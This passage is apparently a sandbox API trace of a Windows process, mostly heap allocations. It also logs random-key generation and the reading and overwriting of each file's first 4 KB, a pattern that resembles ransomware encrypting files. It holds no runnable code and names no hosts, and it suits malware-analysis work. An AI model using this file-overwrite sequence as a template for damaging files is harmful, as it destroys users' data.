(Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.821] GetProcessHeap () returned 0x4f10000 [0079.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.822] GetProcessHeap () returned 0x4f10000 [0079.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.823] GetProcessHeap () returned 0x4f10000 [0079.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.824] GetProcessHeap () returned 0x4f10000 [0079.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.825] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.825] WriteFile (in: hFile=0x83c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.825] WriteFile (in: hFile=0x83c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.825] GetProcessHeap () returned 0x4f10000 [0079.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.825] GetProcessHeap () returned 0x4f10000 [0079.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.825] GetProcessHeap () returned 0x4f10000 [0079.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.825] CloseHandle (hObject=0x83c) returned 1 [0079.826] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 48 [0079.826] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.826] ReadFile (in: hFile=0x840, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.826] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.826] GetProcessHeap () returned 0x4f10000 [0079.826] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.826] GetProcessHeap () returned 0x4f10000 [0079.826] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.827] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.827] GetProcessHeap () returned 0x4f10000 [0079.827] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.827] ReadFile (in: hFile=0x840, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.874] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.874] WriteFile (in: hFile=0x840, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.874] GetProcessHeap () returned 0x4f10000 [0079.874] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.874] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.875] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.875] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.876] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.876] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.877] GetProcessHeap () returned 0x4f10000 [0079.877] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.878] GetProcessHeap () returned 0x4f10000 [0079.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.879] GetProcessHeap () returned 0x4f10000 [0079.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.879] 